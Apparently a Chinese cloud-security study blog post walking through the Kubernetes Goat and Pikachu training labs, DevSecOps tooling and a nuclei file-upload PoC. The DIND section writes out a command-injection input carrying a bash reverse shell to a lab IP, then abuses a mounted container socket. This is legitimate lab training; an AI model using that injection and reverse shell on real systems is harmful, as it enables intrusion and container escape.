k8s云安全、devsecops等知识

1、参考课件复习云相关基础概念


2、使用minikube搭建k8s集群,并学习基础操作


3、搭建k8s-goat靶场,并参考官方文档和课件完成dind等场景的练习

拿到文件,则cd kubernetes-goat进入目录,修改 scenarios/internal-proxy/deployment.yaml 中CPU和内存值为300M,修改下面文件中映射的默认套接字scenarios/health-check/deployment.yaml,修改为/var/run/docker.sock

运行kubernetes-goat的K8S服务

bash 复制代码
bash setup-kubernetes-goat.sh

启动应用服务的端口转发

bash 复制代码
bash access-kubernetes-goat.sh

访问1234端口,就可以看到全部的场景信息,搭建成功

k8s-goat的DIND啊 ,根据提示,访问1231端口

这是一个命令执行的页面,比如下图

我们执行监听ncat -lvvp 6666,接下来submit反弹shell:127.0.0.1;bash -c 'bash -i >& /dev/tcp/192.168.40.128/6666 0>&1',得到下图

执行mount命令,查看文件系统挂载情况

通过 /custom/containerd/containerd.sock 可以对 Docker 进行管理,查看套接字是否可用

下一步下载合适工具控制docker,查看目标系统的架构

根据操作系统架构和docker版本,下载对应的docker客户端

bash 复制代码
wget https://download.docker.com/linux/static/stable/x86_64/docker-26.1.1.tgz -O /tmp/docker.tar.gz

解压缩到临时目录

bash 复制代码
tar -xvf /tmp/docker.tar.gz -C /tmp/

执行 Docker 命令,挂载 sock,进行管理

bash 复制代码
/tmp/docker/docker -H unix:///custom/containerd/containerd.sock images

4、复习devsecops相关概念和开源工具





SAST工具呢,可以看看Fortify和enkins集成-腾讯云开发社区jenkins用户手册Fortify集成-Gitlab

参考基于开源工具实现软件成分分析SCA如何集成 Snyk 和 Bitbucket Cloud 以实现 DevSecOps

参考jenkins+Acunetix实现自动化安全测试 - 菜菜聊架构 - 博客园 (cnblogs.com)Jenkins集成AppScan实现_jenkins scan-build-CSDN博客

参考IAST | 洞态文档 (dongtai.io)IAST 扫描器 - OpenRASP 官方文档 - 开源自适应安全产品 (baidu.com)

5、复习nuclei工具的使用和poc编写,编写pikachu文件上传lou洞poc

根据自己系统情况下载使用
模板仓库

bash 复制代码
nuclei -h

这将显示Nuclei的帮助,以下是所有支持的命令。

nuclei编写pikachu靶场文件上传的poc啊 ,这里我用了ai,编写好后,执行如下图

手动访问以下URL(末尾文件名为实际检测到的文件名):

  • Client Check: http://pp.com/vul/unsafeupload/uploads/client_20260330_1200.php
  • MIME Type: http://pp.com/vul/unsafeupload/uploads/server_20260330_1200.php
  • GetImageSize: http://pp.com/vul/unsafeupload/uploads/2026/03/30/45257169ca672ef1ed5426189047.jpg
    前两种上传的文件,检验可执行性,点击跳转网页显示phpinfo,getimagesize则一片乌黑,那么前两种可执行,getimagesize不可执行

6、认真打磨个人简历

排版参照优秀简历模版,基本的必要属性写清楚明白,求职意向所需要的软硬实力也写明白,其他软硬实力是加分项,也补上有相关性的

相关推荐
静待雨落1 小时前
Docker 高频命令
docker·容器
Database_Cool_1 小时前
数据库性能不够用,升级到什么方案好?阿里云 PolarDB(云原生数据库领导者,兼容 MySQL/PostgreSQL/Oracle)平滑升级与百倍弹性
数据库·阿里云·云原生
霸道流氓气质1 小时前
微服务架构核心概念业务示例
微服务·云原生·架构
OsDepK3 小时前
Windows快速部署Docker
运维·docker·容器
AOwhisky3 小时前
Python 学习笔记(第六期)——函数:定义、参数传递与作用域
笔记·python·学习·云原生·运维开发·函数·参数传递
小小龙学IT3 小时前
Tigris:下一代无服务器数据库
数据库·云原生·serverless
ai_coder_ai5 小时前
论模型驱动分析方法及应用
微服务·云原生·架构
Hiyajo pray6 小时前
云原生场景下:sdn 访问控制优化方案
云原生
前端Baymax6 小时前
kube-proxy iptables模式下NodePort间歇性超时
docker·容器·kubernetes
欢醉6 小时前
k8s的pod容器中微服务无法创建新线程unable to create new native thread
kubernetes·springboot